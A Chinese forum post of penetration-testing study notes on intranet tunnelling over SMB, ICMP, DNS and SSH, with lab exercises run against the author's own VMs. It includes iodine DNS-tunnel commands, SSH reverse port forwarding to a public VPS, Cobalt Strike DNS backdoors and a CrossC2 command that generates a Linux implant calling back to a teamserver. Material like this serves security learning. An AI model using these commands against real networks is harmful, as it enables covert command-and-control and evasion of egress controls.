IT评测·应用市场-qidao123.com技术社区

标题: 内网安全Day5--隧道技术&SSH&DNS&ICMP&SMB [打印本页]

作者: tsx81429    时间: 2024-12-13 21:55
标题: 内网安全Day5--隧道技术&SSH&DNS&ICMP&SMB
本日重要学习了如何利用DNS|SSH隧道技术来让linux&Mac&IOS&Android上线
笔记部门:


1.判定出网协议
2.利用出网协议建立隧道

#SMB隧道&通讯&上线
判定:445通讯
上线:借助通讯后绑定上线
通讯:直接SMB协议通讯即可

#ICMP隧道&通讯&上线
判定:ping命令
上线:见前面课程
通讯:其他项目(icmp icmptunnel)
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

#DNS隧道&通讯&上线
判定:nslookup dig
1.上线环境:内网主机只出网DNS协议数据,办理上线
-域名申请及配置
-监听器创建及配置
-后门绑定监听器及生成
2.通讯环境:
内网主机只出网DNS协议数据,办理通讯
https://github.com/yarrick/iodine
判定出网:nslookup www.baidu.com
-服务器:设置暗码xiaodi 并创建虚拟IP及绑定域名指向
iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
设置暗码xiaodi并创建虚拟IP及绑定域名指向
-客户端:毗连暗码xiaodi并绑定域名指向
iodine -f  -M 200 -P xiaodi ns.xiaodi8.com
-实验通讯实验毗连:
ssh root@192.168.0.2

#SSH隧道&通讯
判定:SSH毗连
1.上线:
由于CS无SSH协议监听器配置,无法上线
2.通讯:
由于SSH协议存在Linux系统,跳板机必须Linux
iptables -F /*清除所有规则*/
iptables -A  INPUT -p tcp  --dport  22  -j  ACCEPT/*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport  22 -m state  --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT  -p udp --dport 53 -j ACCEPT/*域名分析端口,一般不打开*/
iptables -A INPUT  -p udp --dport 53 -j ACCEPT/*域名分析端口,一般不打开*/
iptables -A INPUT  -s  127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT  -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s  0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save> /etc/sysconfig/iptables /*保存配置*/
iptables -L/*显示iptables列表*/

开启SSH协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

本地:出站被封
ssh -cfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
curl http://127.0.0.1:1122
远程: 入站被封
ssh -cfNg -R 1234:192.168.1.15:8080 root@47.94.236.117
curl http://127.0.0.1:1234

#控制上线-插件-Linux&Mac&IOS&Andriod
https://github.com/gloxec/CrossC2
面向Linux Mac IOS  Andriod系统上线支持
1.插件利用
2.命令利用
利用参考:
https://gloxec.github.io/CrossC2/zh_cn
1.下载对应版本加载器和CNA插件
2.上传加载器文件和本地加载CNA插件
3.修改CNA插件配置路径及上传Key文件
4.利用命令或插件绑定HTTPS监听器生成

实验部门:

实验1:DNS隧道技术上线


阿里云有域名的兄弟可以试一下这个操作:
先在阿里云域名分析页添加几个记录值:
1.A-cs(主机记录)--默认(分析线路)--记录值:(本身CS的服务器地址)

2.添加NS记录:
NS1-默认线路--记录值:cs.xiaosedi123.fun

第二条ns:
NS -ns2(主机记录)--默认线路--记录值:cs.xiaodi123.fun

原理:
当访问ns1.xiaosedi123.fun时分析为 cs.xiaosedi123.fun
ns2.xiaosedi123.fun时分析为cs.xiaosedi123.fun
访问cs.xiaosedi123.fun时分析为47.94.236.117

然后打开cs的服务端和客户端:
创建监听器:

创建后门:


 转移到windows靶机上双击运行:

可以看到出现一条黑框,跟我们之间遇到的主机上线的步骤不一样。
这里进入命令行交互页面。

敲下这个命令,调整心跳间隙,稍等一下就会酿成之前的样子

实验1(2):DNS通讯环境:

内网主机只出网DNS协议数据,办理通讯
https://github.com/yarrick/iodine
判定出网:nslookup www.baidu.com
--服务器端:设置暗码xiaodi并创建虚拟IP及绑定域名指向
iodined -f -c -P xiaodi 192.168.0.1(恣意写一个局域网) ns1.xiaodi8.com(前面设置的域名) -DD
设置暗码xiaodi并创建虚拟IP及绑定域名指向
-客户端:毗连暗码xiaodi并绑定域名指向
iodine -f -M 200 -P xiaodi ns1.xiaodi8.com(会在自身电脑上安装一个网卡,跟192.168.0.1处在同一个局域网中)
-实验通讯实验毗连:
ssh root@192.168.0.2
 实验2:SSH隧道&通讯

实验环境:

实验条件,必须使linux为跳板主机。linux必须为最高权限。
个人实验环境:

首先须要在kali和Ubuntu上安装ssh服务:
ubuntu安装ssh:如何在Ubuntu上开启SSH服务 并开机启动_ubuntu ssh 开机启动-CSDN博客
kali安装ssh:Kali安装ssh服务-CSDN博客
在windows10上安装hfs服务器:Release 0.54.0 · rejetto/hfs
当linux上设置防火入站规则只允许22端口流量通过的时候:
利用远程举行反向毗连:
在ubuntu上敲下如下命令,并输入本身kaliVPS的暗码
ssh -CfNg -R 1234:192.168.3.130:8080 root@192.168.164.134(将本地的访问3.130 80的端口流量转发至192.168.164.134 1234)

VPS输入:
curl http://127.0.0.1 1234

本地  出站  走正向:
将本地访问1.16 8080端口流量转发至本地的1122端口
在Ubuntu中敲下如下命令:
ssh -CfNg -L 1122:192.168.3.130:8080 root@192.168.164.134

实验3:linux&Mac的CS上线

强调:CS必须为4.1~4.9版本
首先下载,安装CrossC2插件:
Releases · gloxec/CrossC2

这些都要下载到本地
然后根据CS服务器的版本,去复制对应的操作系统版本。
这里我用的Kali来当作本身的虚拟机,将linux版本复制到相应的CS服务器文件夹中:

重新启动CS:
./teamserver 192.168.164.6 123456
然后将

这个压缩包里的两个cna以及下面这个cna通通加载到插件中:

编辑整个cna:

设置CC2_PATH='' (本身CS服务端的根目录)"
CC2_BIN="genCrossC2.Linux"(根据本身的实际情况编写)
保存后再导入插件:

首先创建一个监听器:


木马的生成:
目前版本只支持反向的https和正向的tcp毗连




/root/CS4-7/genCrossC2.Linux 192.168.164.6 5555 ./.cobaltstrike.beacon_keys null Linux x64 1.out

将这条命令转移到虚拟机中去执行,可以得到1.out


将1.out转移到Ubuntu靶机中去执行,可以发现木立刻线:
留意:利用sudo chmod +x 1.out 然后再双击执行:

至此,文章竣事。
 实验4: 利用MSF使安卓上线:


Kali利用MSF渗透安卓手机_kali入侵安卓手机-CSDN博客
可以参考这篇博客。


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/) Powered by Discuz! X3.4